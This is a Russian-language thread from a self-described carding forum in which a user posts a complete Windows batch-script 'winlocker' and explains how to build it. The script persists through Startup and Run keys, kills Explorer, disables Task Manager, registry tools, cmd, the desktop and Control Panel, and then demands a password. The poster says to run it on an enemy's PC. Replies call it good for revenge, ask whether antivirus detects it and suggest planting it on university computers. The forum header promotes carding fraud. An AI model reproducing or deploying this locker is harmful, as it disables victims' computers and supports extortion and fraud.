Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Пишем простой винлокер в блокноте.

Killmy

Участник клуба
Регистрация
30 Май 2020
Сообщения
377
Реакции
11
Начинаем с открытия блокнота.


Копируем туда этот код: ​

Код:
Echo off


color a


msg by File0


copy blocker.bat "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"


copy blocker.bat "C:\$SysReset"


taskkill /im explorer.exe /f > nul


copy %0 C:\Windows\Win32.bat > nul


reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v


reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /t REG_SZ /d C:\Windows\Win32.bat /f


reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul


reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul


reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul


reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul


reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul


cls


title Windows has been blocked


echo Windows has been blocked


:G


echo Enter the activation code:


set /p x=


if %x%==сюда пишем пароль (echo Windows starting!


start explorer


reg Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f > nul


reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f > nul


reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f >nul


reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 0 /f > nul


reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 0 /f >nul


reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 0 /f >nul


exit


) ELSE (


cls


echo Activation code is incorrect!


echo Enter the acctivation code again!


)


goto G

Далее сохраняем как, blocker.bat (Внимание, очень важно поменять при сохранении расширение на .bat
Итак, мы сохранили.
Всего готово, можно открывать на пк вашего недруга. Если хотите можете скомпилировать этот файл в .exe.
 

Kidsmum

Опытный user
Регистрация
9 Апр 2021
Сообщения
229
Реакции
9
Отличная штука для небольшой мести неприятелям.
 

comphaus

Участник клуба
Регистрация
21 Авг 2022
Сообщения
178
Реакции
8
Помниться как ходила эта хуйня по пк и деньги требовала за разблокировку,я тогда не хуёво заработал на удалении её)
 

Namecard

Опытный user
Регистрация
20 Янв 2022
Сообщения
251
Реакции
12
Вирус тотал палит?
 

Jakkan

Участник клуба
Регистрация
12 Авг 2020
Сообщения
917
Реакции
30
Прикольно, был бы в универе, то оставил такой на компах))
 
Сверху Снизу